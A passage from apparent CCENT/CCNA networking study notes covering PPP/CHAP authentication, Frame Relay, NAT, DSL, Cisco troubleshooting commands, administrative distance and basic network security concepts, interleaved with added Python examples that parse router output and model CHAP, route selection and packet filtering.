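        return self.outstanding

    def verify(self, identifier: int, response: bytes) -> str:
        """Recompute the hash with our copy of the secret; only one response per challenge is accepted."""
        if self.outstanding is None or identifier != self.outstanding[0]:
            return "Failure"
        expected = chap_response(identifier, self.secret, self.outstanding[1])
        self.outstanding = None  # a replayed response finds no challenge to match
        return "Success" if hmac.compare_digest(expected, response) else "Failure"


def chap_peer_answer(identifier: int, challenge: bytes, secret: bytes, name: bytes) -> dict:
    """The peer's Response packet: the hash value plus its name. The secret itself is not sent."""
    return {"identifier": identifier, "value": chap_response(identifier, secret, challenge), "name": name}


def pap_request(peer_id: bytes, password: bytes) -> dict:
    """PAP's Authenticate-Request carries the password in clear text, which is why CHAP is preferred."""
    return {"peer_id": peer_id, "password": password}


def run_chap(authenticator: ChapAuthenticator, peer_secret: bytes, peer_name: bytes) -> str:
    """Both sides of one round trip: Challenge -> Response -> Success/Failure."""
    identifier, challenge = authenticator.challenge()
    answer = chap_peer_answer(identifier, challenge, peer_secret, peer_name)
    return authenticator.verify(answer["identifier"], answer["value"])


if __name__ == "__main__":
    r1 = ChapAuthenticator(b"cisco123")  # constructed shared secret, not from any real config
    print("correct secret:", run_chap(r1, b"cisco123", b"R2"))
    print("wrong secret:  ", run_chap(r1, b"Cisco123", b"R2"))
    print("PAP on the wire:", pap_request(b"R2", b"cisco123"))
```

ChapAuthenticator.verify accepts one response per challenge, so replaying a captured response fails, and a fresh random challenge for every attempt means a response computed for one attempt is useless for the next. What CHAP does not protect against is a weak secret: anyone who captures one challenge/response pair can test guesses offline at MD5 speed, so the secret you configure for CHAP needs to be long and random, and it sits in the router configuration in a form the router can recover, so protect the config as well.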

• To review:
– HDLC is the default encapsulation on a Cisco router's Serial interface.
– PPP has features that allow the use of authentication and data compression.
– PPP also allows multilink bundling, where HDLC does not.

An Introduction To Frame Relay

• Frame Relay's got three things going for it that endears it to network admins:– it's cheap – it's reliable – it's cheap and reliable

• In the case of Frame Relay, we call our friendly Frame Relay service provider and tell him where our routers are, and how much bandwidth we're willing to pay for. The provider then configures some of his frame relay switches, gives us a few numbers to add to our router configuration, and we're all set!

• The frame relay service provider guarantees a certain amount of bandwidth will be available to a given user at any time. The more guaranteed bandwidth desired, the more it costs, but it’s still cheaper than a dedicated point-to-point link. This guaranteed bandwidth is referred to as the committed information rate (CIR).

• Frame relay is a packet-switching protocol. The packets may take different physical paths to the remote devices, at which point they will be reassembled and will take the form of the original message. In contrast, circuit-switching protocols have dedicated paths for data to travel from one point to another.

• There are two types of virtual circuits, one much more popular than the other. A permanent virtual circuit (PVC) is available at all times, where a switched virtual circuit(SVC) is up only when certain criteria are met. You're going to see PVCs in most of today's networks, and we'll build some during your CCNA studies.

• You were introduced to the three RFC 1918 private address ranges in the IP Addressing section, but let's review them here:
– Class A: 10.0.0.0 - 10.255.255.255 (10.0.0.0 /8)
– Class B: 172.16.0.0 - 172.31.255.255 (172.16.0.0 /12)
– Class C: 192.168.0.0 - 192.168.255.255 (192.168.0.0 /16)

• You also learned that these addresses are not routable on the public Internet - without any additional help (that help being NAT), hosts with these addresses will not be able to communicate with any hosts outside their private network. That means no Internet access and no communication with hosts at other sites across the Internet!

• The actual NAT and PAT translation table can be viewed with the command show ip nat translations. Even if you're running PAT, the commands will still reference NAT.

R3#show ip nat translations
Pro Inside global      Inside local       Outside local      Outside global
--- 210.1.1.2          10.5.5.5           ---                ---
--- 210.1.1.3          10.5.5.6           ---                ---
--- 210.1.1.4          10.5.5.7           ---                ---

• Notice those four terms in the translation table - "inside global", "inside local", and so forth? Here's what they mean:

• Inside local addresses are used by hosts on the inside network to communicate with other hosts on that same network. These are the addresses that are actually configured on the hosts, and generally they are RFC 1918 private addresses.

• These inside local addresses are translated into inside global addresses. Inside global addresses are routable addresses. In the translation table above, 10.5.5.5 is an inside local address and 210.1.1.2 is the inside global address it has been translated to.

• Outside global addresses are the addresses that are configured on the outside hosts. These are fully routable addresses used by Internet-based hosts.

• Finally, outside local addresses are how those same outside hosts appear to hosts on the inside network. Unless you have configured NAT to translate outside addresses as well, the outside local address is the same as the outside global address, which is why those two columns are empty in the simple translations above.

• What follows is strictly an overview of some other WAN communication methods, and with ATM, it's really an overview! Configuration of ATM is far beyond the scope of the CCENT and CCNA exams, but it's a good idea to know the basics.

• The Asynchronous Transfer Mode (ATM) is unique in that it does not handle frames, as Frame Relay does. ATM places data into cells, and all ATM cells are exactly the same size, 53 bytes - 48 bytes of data and a 5-byte header.

• Remember the Frame Relay switches that made up the Frame Relay cloud? ATM works along the same lines in that the service provider maintains ATM switches. ATM networks are much faster than Frame Relay networks, but are more expensive to build and maintain. That includes the need for specialized hardware. You can't just sit down and configure ATM on a Cisco serial interface as you could Frame Relay - you'll need special interfaces to use ATM.

• Some ATM documentation says that ATM is a packet-switching service like Frame Relay, and technically that's true, but more commonly you'll hear ATM referred to as cell-switching. After all, that's what ATM switches!

• On the other end of the speed spectrum, we've got modems - and yes, they're still out there! In the previous CSU/DSU illustrations, a modem could and sometimes does take the place of the CSU/DSU.

• The word "modem" actually comes from the two operations they carry out:
– Modulation, the process of translating digital signals into analog signals that can be carried over a phone line
– Demodulation, the process of translating those analog signals back into digital signals that the receiving device can understand

• The two real drawbacks of modems are:
– They're not as fast as other methods
– They tie up the phone line, and other calls cannot be made while the modem is using the line

• Asymmetrical DSL works under the assumption that the user will download more information than they send, and for the average Internet user, that's a safe assumption. The connection speed from the provider to the user is going to be 3 - 4 times faster than the speed from the user to the provider. A typical ADSL connection of 512 kbps will give the user 384 kbps download capability, but only 128 kbps upload capability.

• ADSL allows a telephone call and internet access simultaneously.


• ADSL uses several different modulation methods, but the most well-known is G.lite (also known as G.992.2), which requires no splitter at the customer location. The customer simply hooks up a G.lite modem in the same way an old-fashioned analog modem would be installed.

• G.lite's limitation is speed - where standard ADSL can offer 8 MBPS download speed and 1.5 upload speed, G.lite's maximum capability is 1.5 MBPS downloading and 512 KBPS uploading. The key is that while G.lite is slower than true ADSL, it's still a lot faster than the dialup options available to today's home users.

• The distance limitation of ADSL must be taken into account as well. Officially, there's an 18,000-foot limitation on ADSL services, but most ISPs put a lower limit on ADSL to avoid poor quality service for those near the end of the cable. Of course, that limitation is for data transmission, not voice.

• Since we have asymmetric DSL, it makes sense that we'd have symmetric DSL (SDSL) as well. The term "symmetric" refers to the fact that the sending and receiving speed are the same. The drawback is that the phone cannot be used while SDSL is in use.

Page 112: Notes

• Two less-common DSL flavors:
– Very High Bit-Rate DSL (VDSL) has the capability to deliver speed up to 52 MBPS. That's an amazing speed to deliver over copper wire, but there's a drawback - VDSL over copper has a maximum distance of 4000 feet. As more fiber-optic cable is installed by the telephone companies, VDSL is becoming available in more communities as the distance issue is resolved by the use of fiber.
– Rate-Adaptive DSL (RADSL) is just what it sounds like - the software calculates the maximum download and upload speeds on the customer's preexisting phone line and dynamically adjusts those rates.

Video 12: Troubleshooting

Page 113: Notes

Troubleshooting

• Where to Begin
• Cisco Discovery Protocol (CDP)
• L1 and L2 Troubleshooting
• LAN Troubleshooting
• WAN Troubleshooting
• Extended Ping and Traceroute
• Telnet and SSH Review and Maintenance Commands
• Administrative Distance
• The Real Key to Troubleshooting

• When you begin troubleshooting, make sure everything's working at the Physical layer of the OSI model. That's a formal way of saying…
– Is this thing on?
– Is the right cable in use?
– Has the cable come loose just enough to bring things down?

• That first bullet point is self-explanatory, so I'll leave that one alone. When it comes to the right cable, remember the basics:
– Crossover cables are required to connect switches for trunking
– Rollover cables are required to connect a laptop to the Console port of a router, and you may need an adapter to use a rollover cable with your laptop

Page 114: Notes

• You can check a Cisco device's physical connections with Cisco Discovery Protocol, which runs by default on Cisco routers and switches, both globally and on a per-interface level.

• For security purposes, many admins choose to disable CDP. Here's the command to see if CDP is indeed running on a router or switch:

Router1#show cdp
Global CDP information:
        Sending CDP packets every 60 seconds
        Sending a holdtime value of 180 seconds
        Sending CDPv2 advertisements is enabled

• That output means that CDP is indeed enabled. If you see the following, it's off. But you didn't need me to tell you that!

Router1#show cdp

% CDP is not enabled

Router1#

Page 115: Notes

• Device ID is the remote device's hostname.
• Local Interface is the local switch's interface connected to the remote host.
• Holdtime is the number of seconds the local device will retain the contents of the last CDP Advertisement received from the remote host.

• Capability shows you what type of device the remote host is. The first two connections are to a switch, and the third is to a router.

• Platform is the remote device's hardware platform. The top two connections are to a 2950 switch, and the third is to a 2520 router.

• Port ID is the remote device's interface on the direct connection.
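A small audit helper for the CDP outputs just described, added here as an example (it is not course material and not Cisco code). It decides from show cdp whether CDP is still running, pulls the timers out, and parses a show cdp neighbors table into records with the six fields listed above. The two show cdp results are the ones from the notes; the neighbor table is a constructed sample laid out the way IOS prints it, with made-up hostnames (SW1, R2) and platforms chosen to match the notes' description of two links to a 2950 switch and one to a 2520 router.

```python
"""Audit helpers for Cisco Discovery Protocol output.

Added example: not course material and not Cisco code. The `show cdp`
results are the two from the notes; the `show cdp neighbors` table is a
constructed sample laid out the way IOS prints it.
"""
import re
from dataclasses import dataclass

# The two global `show cdp` results shown in the notes.
SHOW_CDP_ENABLED = """Global CDP information:
        Sending CDP packets every 60 seconds
        Sending a holdtime value of 180 seconds
        Sending CDPv2 advertisements is enabled
"""
SHOW_CDP_DISABLED = "% CDP is not enabled\n"

# Constructed sample (hostnames and platforms are made up): two links to a
# 2950 switch and one to a 2520 router, matching the notes' description.
SHOW_CDP_NEIGHBORS = """Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
                  S - Switch, H - Host, I - IGMP, r - Repeater, P - Phone

Device ID        Local Intrfce     Holdtme    Capability  Platform  Port ID
SW1              Fas 0/1            156          S I      WS-C2950  Fas 0/24
SW1              Fas 0/2            156          S I      WS-C2950  Fas 0/23
R2               Ser 0              142          R        2520      Ser 1
"""


@dataclass
class Neighbor:
    device_id: str        # remote device's hostname
    local_interface: str  # our interface that faces the neighbor
    holdtime: int         # seconds we keep the last advertisement
    capability: set       # capability codes, e.g. {"S", "I"} or {"R"}
    platform: str         # remote hardware platform
    port_id: str          # the neighbor's interface on this link


def cdp_enabled(show_cdp_output: str) -> bool:
    """True when `show cdp` prints global CDP information, False when it
    prints the '% CDP is not enabled' message."""
    text = show_cdp_output.strip()
    if text.startswith("% CDP is not enabled"):
        return False
    return text.startswith("Global CDP information")


def cdp_timers(show_cdp_output: str) -> dict:
    """Extract the advertisement interval and holdtime from `show cdp`."""
    timers = {}
    m = re.search(r"Sending CDP packets every (\d+) seconds", show_cdp_output)
    if m:
        timers["interval"] = int(m.group(1))
    m = re.search(r"Sending a holdtime value of (\d+) seconds", show_cdp_output)
    if m:
        timers["holdtime"] = int(m.group(1))
    return timers


# One neighbor row: interface names are two tokens ("Fas 0/1"), capability
# is one or more single-letter codes, platform is a single token.
_ROW = re.compile(
    r"^(?P<dev>\S+)\s+(?P<local>\S+ \S+)\s+(?P<hold>\d+)\s+"
    r"(?P<cap>[A-Za-z](?: [A-Za-z])*)\s+(?P<plat>\S+)\s+(?P<port>\S+ \S+)\s*$"
)


def parse_cdp_neighbors(output: str) -> list:
    """Turn the `show cdp neighbors` table into Neighbor records; header
    and legend lines do not fit the row pattern and are skipped."""
    neighbors = []
    for line in output.splitlines():
        m = _ROW.match(line)
        if m:
            neighbors.append(Neighbor(
                device_id=m.group("dev"),
                local_interface=m.group("local"),
                holdtime=int(m.group("hold")),
                capability=set(m.group("cap").split()),
                platform=m.group("plat"),
                port_id=m.group("port"),
            ))
    return neighbors


def neighbor_summary(output: str) -> dict:
    """Count switch and router neighbors from the Capability column."""
    summary = {"switches": 0, "routers": 0}
    for n in parse_cdp_neighbors(output):
        if "S" in n.capability:
            summary["switches"] += 1
        if "R" in n.capability:
            summary["routers"] += 1
    return summary
```

Run across a fleet, cdp_enabled is the quick check for devices where CDP was supposed to be turned off; parse_cdp_neighbors gives you the same Device ID / Local Interface / Holdtime / Capability / Platform / Port ID columns as records you can compare against an inventory.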


• When an interface is functioning correctly, this is what we see at the top of the show interface output.

Router1#show int serial0

Serial0 is up, line protocol is up

Page 116: Notes

• Of course, if the interface looked like that, we wouldn't be troubleshooting, would we? Let's take a look at common show interface outputs that do indicate a problem, along with the solutions for these issues.

Router1#show int serial0

Serial0 is administratively down, line protocol is down

• This one's easy! administratively down means the interface is indeed shut down. Open the interface with no shutdown.

Router1(config)#int serial0

Router1(config-if)#no shut


• Always give the line protocol a minute or so to come up after opening a serial interface.

Router1#show interface serial0

Serial0 is up, line protocol is up

Page 117: Notes

• Success! Let's look at another potential readout:

Router1#show interface serial 0

Serial0 is down, line protocol is down


• After plugging this loose cable back in ....

Router1#

20:14:47: %LINK-3-UPDOWN: Interface Serial0, changed state to up

20:14:48: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial0, changed state to up


• There's one other reason a port can be down physically, and you saw this in the Switching section:

SW2#show int fast 0/3

FastEthernet0/3 is down, line protocol is down (err-disabled)

Page 118: Notes

• There's one more physical / line protocol combination we have to be ready to troubleshoot:

Router1#show int serial 0

Serial0 is up, line protocol is down
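To pull the five status lines from these slides together, here is an added Python example (not course material) that reads the first line of show interface output and returns which layer to look at and the first thing to do. The status lines it runs on are constructed to match the ones above; the err-disabled recovery step (shutdown, then no shutdown) and the Layer 2 checks for the up/down case are standard IOS practice rather than something the notes spell out.

```python
"""Classify the first line of `show interface` output.

Added example, not course material. The status lines below are
constructed to match the slides; the recovery actions are standard IOS
practice, not something the notes spell out.
"""
import re

# Constructed sample lines in the shape IOS prints them.
SAMPLE_LINES = [
    "Serial0 is up, line protocol is up",
    "Serial0 is administratively down, line protocol is down",
    "Serial0 is down, line protocol is down",
    "FastEthernet0/3 is down, line protocol is down (err-disabled)",
    "Serial0 is up, line protocol is down",
]

_STATUS = re.compile(
    r"^(?P<intf>\S+) is (?P<phys>administratively down|up|down), "
    r"line protocol is (?P<proto>up|down)(?P<note> \(err-disabled\))?\s*$"
)


def parse_status(line: str) -> dict:
    """Split a status line into interface, physical state and protocol state."""
    m = _STATUS.match(line)
    if not m:
        raise ValueError(f"not a show interface status line: {line!r}")
    return {
        "interface": m.group("intf"),
        "physical": m.group("phys"),
        "protocol": m.group("proto"),
        "err_disabled": m.group("note") is not None,
    }


def diagnose(line: str) -> dict:
    """Map the state pair to the layer at fault and the first thing to do."""
    s = parse_status(line)
    if s["physical"] == "up" and s["protocol"] == "up":
        s.update(layer=None, action="interface is healthy; look elsewhere")
    elif s["physical"] == "administratively down":
        # Someone shut it: open it and give the line protocol a minute.
        s.update(layer=1, action="shut down by config: 'no shutdown', then wait")
    elif s["err_disabled"]:
        # The switch disabled the port itself; fix the cause, then bounce it.
        s.update(layer=1, action="err-disabled: clear the cause, then 'shutdown' / 'no shutdown'")
    elif s["physical"] == "down":
        s.update(layer=1, action="no carrier: reseat the cable, check cable type and the far end")
    else:
        # Physical up, protocol down: the wire is fine, Layer 2 is not talking.
        s.update(layer=2, action="Layer 2: check encapsulation, clock rate/keepalives and the far-end config")
    return s


def triage(lines: list) -> list:
    """Diagnose each line and return only the interfaces that need attention."""
    return [d for d in map(diagnose, lines) if d["layer"] is not None]
```

The order of the tests inside diagnose matters: administratively down and err-disabled are both reported as physically down, so they are checked before the generic down/down case, otherwise every shut interface would be reported as a cable problem.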


• If a switch encounters a problem while you're configuring it, it's probably because you just misconfigured something. Undo what you just did. The same goes for routers. No big deal, just fix it.

• Simple, right? Right!


• If we were still not able to ping between those two hosts, I would check the VLAN port membership on the switches with show vlan brief.

• You'll see more of this in your CCNA studies, but remember - if hosts are in different VLANs, they will not be able to send IP packets to each other without a Layer 3 device being involved.

Page 119: Notes

• Just with that simple network, we ran into quite a few things that could have been the cause of the issue:
– Ethernet interface not open
– Ethernet interface had no IP address
– Hosts in different VLANs
– Loose cable (show interface verified the physical cable was fine)

• For real-world PC troubleshooting, you can run ipconfig /all to check a host's IP address, network mask, DNS server location, and much more. This is where I always start troubleshooting when a PC can't access network resources. The CCENT exam is not a PC troubleshooting exam, but since we do spend a good amount of time working with PCs as network admins, it's a good idea to be very familiar with the output of this command.


• Here are some other Microsoft PC commands you may find helpful:

• ipconfig /release will release the PC's DHCP-assigned information.

• ipconfig /renew will actively ask the DHCP server(s) for an IP address and other information needed for LAN connectivity, including DNS server location.

Page 120: Notes

• netstat -rn displays the host's routing table. Yes, PCs have routing tables!

• It's my experience that ipconfig /all is the best place to begin troubleshooting at the PC level - but don't forget to check the cables first!


Telnet And SSH

• We discussed both of these tools in depth in another section, so I won't do so again here. A couple of things to watch with both Telnet and SSH:
– Cisco routers do not allow users to connect via Telnet or SSH by default. A password must be set on the VTY lines.
– Users who connect to a router via Telnet or SSH will by default be put into user exec mode, and for those users to have access to enable mode, an enable password must be set, *or* you must configure the privilege level 15 command on the VTY lines - that will place the incoming user into enable mode immediately upon VTY authentication.
– Telnet sends all data in clear text; SSH encrypts all data, including passwords, but SSH does require more configuration and possible extra hardware, depending on the size of the deployment.

Page 121: Notes

• If you have multiple Telnet sessions open, you can run show sessions to get basic information about each one.

BRYANT_ADVANTAGE_2#show sessions
Conn Host                Address             Byte  Idle Conn Name
   1 blondie             100.1.1.1              0     1 blondie
   2 angeleyes           110.1.1.1              4     1 angeleyes
*  3 tuco                120.1.1.1              0     0 tuco

• To reconnect to any given Telnet session, you can use the resume command followed by the connection number, or just enter the connection number. To resume the connection to tuco, you could enter resume 3 or just the number 3.

BRYANT_ADVANTAGE_2#3

[Resuming connection 3 to tuco ... ]


• To suspend the open session, use this key combination:

< CTRL - ALT - 6 >, followed by < X >

Page 122: Notes

• To disconnect any open session, use the disconnect command followed by the connection number. You will be prompted to confirm this request.

BRYANT_ADVANTAGE_2#disconnect 2

Closing connection to angeleyes [confirm]

• We could use show sessions to verify, but we'll use the where command instead. show sessions and where do the exact same thing, so watch that on exam day!

BRYANT_ADVANTAGE_2#where
Conn Host                Address             Byte  Idle Conn Name
   1 blondie             100.1.1.1              0     8 blondie
*  3 tuco                100.1.1.1              4     1 tuco

Ping And Traceroute

• You've seen "regular ping" throughout the course, and that strange phrasing may make you wonder "What do you mean, regular ping?" The ping we've seen throughout the course simply specified a destination IP address, and we received one of three returns so far:

Page 123: Notes

• !!!!! -- IP connectivity to destination exists

• ..... -- IP connectivity to destination does not exist

• U.U.U -- The local router has a route to the destination, but a downstream router does not

Router1#traceroute 208.109.62.234
Type escape sequence to abort.
Tracing the route to 208.109.62.234

  1 73.141.64.1 8 msec 8 msec 12 msec
  2 68.86.174.161 12 msec 12 msec 12 msec
  3 68.86.172.6 12 msec 12 msec 12 msec
  4 68.86.172.85 12 msec 12 msec 12 msec
  5 67.17.194.98 12 msec 12 msec 16 msec
  6 67.17.194.97 24 msec 16 msec 16 msec
  7 64.214.196.22 76 msec 76 msec 76 msec
  8 66.235.224.6 80 msec 80 msec 76 msec
  9 208.109.112.137 76 msec 80 msec 76 msec
 10 208.109.112.161 80 msec 80 msec 76 msec
 11 208.109.112.145 80 msec 76 msec 80 msec
 12 208.109.112.173 80 msec 80 msec 76 msec
 13 * * *
 14 * * *
 15 * * *
 16 * * *

• By the way, if you just let those asterisks keep coming, you're going to see 30 rows of them. If you're running this command and someone else is there, they're going to ask the musical question:– "Is it supposed to be doing that?"

Page 124: Notes

• At the beginning of the traceroute output, the router says "Type escape sequence to abort." Did you also notice that the router doesn't tell you what the sequence is? ARRRGH!!!

• That can be pretty frustrating and/or embarrassing, so I'll tell you what that sequence is. Don't tell anybody else, it's our secret:

< CTRL - SHIFT - 6>

• Microsoft offers a version of traceroute as well - use the tracert command to see the options.

C:\>tracert

Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

Options:
    -d                 Do not resolve addresses to hostnames.
    -h maximum_hops    Maximum number of hops to search for target.
    -j host-list       Loose source route along host-list.
    -w timeout         Wait timeout milliseconds for each reply.

• Consider this routing table:

D 191.168.32.0/26 [90/25789217] via 40.1.1.1 (D = EIGRP route)
R 191.168.32.0/24 [120/4] via 50.1.1.2 (R = RIP)
O 191.168.32.0/19 [110/229840] via 60.1.1.3 (O = OSPF)

Page 125: Notes

• What if the routes for a destination are all the same? Consider the same table, but with subnet masks of the same length for each protocol.

D 191.168.32.0/24 [90/25789217] via 10.1.1.1

R 191.168.32.0/24 [120/4] via 10.1.1.2

O 191.168.32.0/24 [110/229840] via 10.1.1.3

• Two key points about administrative distance:
– AD is a measure of a route's believability. The lower the AD, the more believable the route. This is one time when bigger is NOT better!
– AD only comes into play when there is a tie in the "longest match" route comparison, as shown previously.

Route Source          Administrative Distance
Directly Connected    0
Static                1
EIGRP Summary         5
Internal EIGRP        90
IGRP                  100
OSPF                  110
ISIS                  115
RIP                   120
External EIGRP        170
iBGP                  200
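An added worked example (not course code) of the selection order these slides describe: longest match first, administrative distance only when the prefix lengths tie, and the protocol's own metric last. It parses the two routing tables from the notes and reports which criterion settled each lookup. The destination addresses it is queried with are made up; the route lines are the ones above.

```python
"""Route selection the way these slides describe it: longest match first,
administrative distance only on a tie, metric last.

Added example, not course code. The two tables are the ones from the
notes; the destination addresses queried in the usage are made up.
"""
import ipaddress
import re

# Routing table from the notes with three different mask lengths.
TABLE_MIXED = """D 191.168.32.0/26 [90/25789217] via 40.1.1.1
R 191.168.32.0/24 [120/4] via 50.1.1.2
O 191.168.32.0/19 [110/229840] via 60.1.1.3
"""

# Same prefix, same length from all three protocols: only AD can decide.
TABLE_SAME_LEN = """D 191.168.32.0/24 [90/25789217] via 10.1.1.1
R 191.168.32.0/24 [120/4] via 10.1.1.2
O 191.168.32.0/24 [110/229840] via 10.1.1.3
"""

# "<code> <prefix> [<AD>/<metric>] via <next hop>", as IOS prints it.
_ROUTE = re.compile(
    r"^(?P<code>[A-Za-z]+(?: [A-Z0-9]{1,2})?)\s+"
    r"(?P<prefix>\d+\.\d+\.\d+\.\d+/\d+)\s+"
    r"\[(?P<ad>\d+)/(?P<metric>\d+)\]\s+via\s+(?P<nh>\d+\.\d+\.\d+\.\d+)"
)


def parse_table(text: str) -> list:
    """Parse routing-table lines; anything that does not fit is ignored."""
    routes = []
    for line in text.splitlines():
        m = _ROUTE.match(line.strip())
        if m:
            routes.append({
                "code": m.group("code"),
                "network": ipaddress.ip_network(m.group("prefix"), strict=False),
                "ad": int(m.group("ad")),
                "metric": int(m.group("metric")),
                "next_hop": m.group("nh"),
            })
    return routes


def decide(routes: list, destination: str) -> tuple:
    """Return (best route, reason), where reason names the criterion that
    settled it: 'longest match', 'administrative distance' or 'metric'."""
    dst = ipaddress.ip_address(destination)
    cands = [r for r in routes if dst in r["network"]]
    if not cands:
        return None, "no route"
    # 1. The most specific prefix wins, regardless of who advertised it.
    longest = max(r["network"].prefixlen for r in cands)
    cands = [r for r in cands if r["network"].prefixlen == longest]
    if len(cands) == 1:
        return cands[0], "longest match"
    # 2. Equal length: the lowest AD is the most believable source.
    lowest_ad = min(r["ad"] for r in cands)
    cands = [r for r in cands if r["ad"] == lowest_ad]
    if len(cands) == 1:
        return cands[0], "administrative distance"
    # 3. Same source: its own metric decides.
    cands.sort(key=lambda r: r["metric"])
    return cands[0], "metric"


if __name__ == "__main__":
    for table in (TABLE_MIXED, TABLE_SAME_LEN):
        routes = parse_table(table)
        for dest in ("191.168.32.10", "191.168.32.100", "191.168.40.1"):
            best, why = decide(routes, dest)
            print(dest, "->", best["next_hop"] if best else None, f"({why})")
```

Against the mixed table, 191.168.32.10 falls inside all three prefixes and the EIGRP /26 wins on length alone; 191.168.32.100 is outside the /26, so the RIP /24 beats the OSPF /19 even though RIP has the worse AD. Only in the second table, where every prefix is a /24, does the AD of 90 make EIGRP the answer.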

Page 126: Notes

• The Real Keys To Becoming A World-Class Troubleshooter
– Learning to troubleshoot networks is just that - a learning experience. I've been in IT for well over a decade and I learn something new every day. I have always loved troubleshooting, and I can tell you this from personal experience: Troubleshooting is all about knowing the fundamentals *and* having a structured approach. Learn the fundamentals, develop your own approach, and you will be totally unstoppable in both the exam room and dealing with real-world networks.

Video 13: Introduction to Network Security

Introduction to Network Security

• Firewalls and Proxy Servers
• The Attacker’s Arsenal
• Intro to PIX, ASA, IDS, and IPS
• Viruses, Worms, and Trojan Horses
• Preventing Virus Attacks
• One Final Cisco “Secret”
• A Final Word

Page 127: Notes

Firewalls

• A firewall is your basic protection against Internet-based attackers. A firewall is a physical device that filters packets heading for your network, and those filters are set to block attempts to harm your network. The firewall shown in the following illustration is generally where you see them in networks - between the inside network / end users and the Internet.

• protocol ("don't allow any IPX traffic")
• source IP address ("don't allow any traffic from the 172.10.1.0 /24 network to exit the network")
• port number ("don't allow any traffic sourced from port 23 to enter the network")


• Users cannot receive email. Make sure the incoming POP3 port (110) is open. This happens a lot when new firewalls are put in.

• Users cannot send email. Make sure the outgoing SMTP port (25) is open.

• You need to block users from accessing the Web. Make sure the HTTP egress ("outgoing") port is blocked.
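To make the filter rules above concrete, here is an added Python example (not a Cisco product and not course code) of a first-match packet filter that encodes the three sample filters and the three mail/web cases. It follows the notes' wording, so POP3 is permitted inbound and SMTP outbound; on a real network the direction depends on where the mail server sits. The sample packets, the inside/outside addresses and the closing implicit deny are assumptions.

```python
"""First-match packet filter built from the rules these slides describe.

Added example, not Cisco code and not from the course. Addresses, the
sample packets and the closing implicit deny are assumptions.
"""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    direction: str       # "in" (Internet -> inside) or "out" (inside -> Internet)
    protocol: str        # "tcp", "udp", "icmp", "ipx", ...
    src: str             # source address ("" for non-IP traffic such as IPX)
    dst: str
    src_port: int = 0
    dst_port: int = 0


@dataclass(frozen=True)
class Rule:
    action: str                  # "permit" or "deny"
    direction: str = "any"
    protocol: str = "any"
    src_net: str = "0.0.0.0/0"   # any source
    src_port: int = 0            # 0 = any port
    dst_port: int = 0
    comment: str = ""

    def matches(self, p: Packet) -> bool:
        if self.direction != "any" and self.direction != p.direction:
            return False
        if self.protocol != "any" and self.protocol != p.protocol:
            return False
        if self.src_port and self.src_port != p.src_port:
            return False
        if self.dst_port and self.dst_port != p.dst_port:
            return False
        if self.src_net != "0.0.0.0/0":
            try:
                src = ipaddress.ip_address(p.src)
            except ValueError:   # non-IP traffic never matches an IP source filter
                return False
            if src not in ipaddress.ip_network(self.src_net):
                return False
        return True


# The three filter examples from the notes, then the mail and web cases.
# Order matters: the first rule that matches decides.
RULES = [
    Rule("deny", protocol="ipx", comment="don't allow any IPX traffic"),
    Rule("deny", direction="out", src_net="172.10.1.0/24",
         comment="don't allow 172.10.1.0/24 to exit the network"),
    Rule("deny", direction="in", src_port=23,
         comment="don't allow traffic sourced from port 23 to enter"),
    Rule("permit", direction="in", protocol="tcp", dst_port=110,
         comment="POP3 in, so users can receive mail"),
    Rule("permit", direction="out", protocol="tcp", dst_port=25,
         comment="SMTP out, so users can send mail"),
    Rule("deny", direction="out", protocol="tcp", dst_port=80,
         comment="block HTTP egress"),
    Rule("permit", direction="out", comment="everything else may leave"),
]


def filter_packet(rules: list, packet: Packet) -> tuple:
    """Return (action, reason) from the first matching rule, or the assumed
    implicit deny when nothing matched (there is no blanket inbound permit)."""
    for rule in rules:
        if rule.matches(packet):
            return rule.action, rule.comment
    return "deny", "implicit deny (assumed default)"


# Constructed sample traffic; 172.10.1.0/24 is the network the notes use,
# the other addresses are made up.
SAMPLE_PACKETS = [
    Packet("out", "ipx", "", ""),
    Packet("out", "tcp", "172.10.1.5", "198.51.100.7", 51000, 443),
    Packet("in", "tcp", "198.51.100.7", "10.1.1.5", 23, 40000),
    Packet("in", "tcp", "198.51.100.7", "10.1.1.5", 51000, 110),
    Packet("in", "tcp", "198.51.100.7", "10.1.1.5", 51000, 143),
    Packet("out", "tcp", "10.1.1.5", "198.51.100.7", 51000, 25),
    Packet("out", "tcp", "10.1.1.5", "198.51.100.7", 51000, 80),
    Packet("out", "tcp", "10.1.1.5", "198.51.100.7", 51000, 443),
]


def decisions(rules: list, packets: list) -> list:
    """Run every sample packet through the rule set and collect the verdicts."""
    return [filter_packet(rules, p)[0] for p in packets]
```

Two things the sample traffic shows: the "Users cannot receive email" case is the IMAP packet to port 143, which hits the implicit deny because only 110 was opened; and the HTTP deny must sit above the blanket outbound permit, or the web would never be blocked.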

Page 128: Notes

• Network attackers can have one or more agendas:
– Financial gain, possibly blackmailing you for access to your stolen and now inaccessible data
– Simply seeing if they can gain access, just for the fun of it
– Damaging the network for personal satisfaction

• One network attack type is a Denial of Service (DoS) attack. Basically, the attacker(s) attempt to overwhelm the server with TCP connection requests, which has two negative effects:
– Legitimate users cannot access the server due to network congestion caused by the DoS requests
– The attacked server's resources are so busy attempting to answer the service requests that it cannot answer legitimate requests, or the server simply crashes under the load

• A DoS attack is really designed more to damage network access than to steal data. A common technique to steal data and perhaps profit by its sale or use is a combination of reconnaissance attacks and access attacks.

Page 129: Notes

• When a military patrol goes on a reconnaissance mission, it's not looking for a fight with the enemy; it's gathering information for a future attack, looking for strengths and weaknesses. That's exactly what a reconnaissance mission is in networking. The intruder uses different techniques to gather information about your network's strengths and weaknesses, and the intruder will return later and utilize that information to his advantage - and your dismay.


• While the information gathered during a reconnaissance attack can be used for a DoS attack, most likely it'll be used for an access attack. That's where data is actually compromised and/or stolen by the intruder for their own personal use, financial gain, or occasionally just to embarrass the company they stole the data from.

• With so many different external network threats, it's really not enough to "just" have a firewall in place today. That's why Cisco developed the Adaptive Security Appliance. From Cisco's website, here's how they describe the ASA:

• "The Cisco ASA Series controls network and application traffic, delivers flexible Virtual Private Network (VPN) connectivity, and reduces the overall deployment, operations costs and complexity that would otherwise be associated with this level of comprehensive security."

Page 130: Notes

